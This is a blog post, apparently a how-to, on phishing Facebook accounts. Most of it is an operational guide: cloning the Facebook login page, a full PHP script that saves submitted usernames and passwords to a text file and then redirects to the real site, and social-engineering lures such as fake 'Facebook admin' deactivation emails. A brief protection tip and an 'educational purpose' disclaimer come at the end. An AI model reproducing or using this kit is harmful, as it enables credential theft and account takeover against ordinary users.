Hi, this is kushal kolekar. Today we are going to see how many hackers hacks facebook accounts by phishing.
Phishing : It is a hacking technique in which the hacker can get your sensitive information's like username, password, email, credit card information, bank account information's. In short its a "Scamming method used to get personal information". It is only you who provide them your information. they may ask you some questions, may send you some webpages (fake) which may look like original pages (facebook login page, Gmail, etc.) and after you filling these pages they may redirect your information to other destination where they want.
Now lets see how actually it works and how to recognize phishing email messages, links.
Phishing setps:
we need three files a) facebook.php (fack fb page) b) login.php (script) c) password.txt
1) open www.facebook.com Login page. Right click on it and click on view page source.
2) It will get you to another window where you will find source code of that page. copy all content and save in another text file and save as facebook.php. before saving it we have to altar its code for providing a destination to take the victims username and password.
As shown in above image, < form id="login_form" action =" " method="post" ......>
here in action we have to pass the name of the php script file. Then save this page as facebook.php and upload it to your website file manager.
3) Login.php : It is a php script file. Create a new txt file. and paste following code in it
<?php
header("Location: http://www.facebook.com");
$kushal = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($kushal, $variable);
fwrite($kushal, "=");
fwrite($kushal, $value);
fwrite($kushal, "\r\n");
}
fwrite($kushal, "\r\n");
fwrite("=======================");
fclose($kushal);
exit;
?>
Save this file as login.php. and upload this too in your file manager.
3) In above code 3rd line. "password.txt" is the file where we are going to take victims username and password.
4) Now we have to send this facebook.php page to victim via many ways like make advertisement and ask them to like their page on Facebook click on following link. or sent a email as a fb admin to alert user that your account is deactivated or any other reason and click on following link to get activated. or we can make a hyperlink to any image, text and send it to the victim to divert them to our fake page.
5) If victim click on you link. they will directed to the the facebook login page which is fake created by us (facebook.php).
6) Now victim will assume that this is a facebook login page. and he will put his username and password in textfields as usual. and as soon as he will click on login. whatever writen in usename and password TextFields that will get diverted to our password.txt file.
Phishing mail:
How to protect your account from phishing.
1) Whenever your login to your facebook account. Check the URL it should be www.facebook.com it should not be a link to a login page as shown in following image or it should not be a www.faceb00k.com, www.faecbook.com..
3) Do not reply to the email asking to update facebook account.
[ Note : This article is for educational purpose and to have an idea how to protect fb account. if any missuses or any buddy use it to hack others password. Blog will not be responsible for that. ]
Computer Tricks & Tips
Kushal K. Kolekar